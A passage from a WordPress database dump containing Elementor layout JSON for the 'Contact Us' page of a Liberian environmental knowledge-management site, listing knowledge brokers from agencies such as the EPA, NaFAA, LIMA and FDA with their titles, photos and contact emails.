\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager-CCCD Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23517,3422,'_elementor_edit_mode','builder'),(23518,3422,'_elementor_template_type','wp-page'),(23519,3422,'_elementor_version','3.0.16'),(23520,3422,'_wp_page_template','default'),(23521,3422,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a 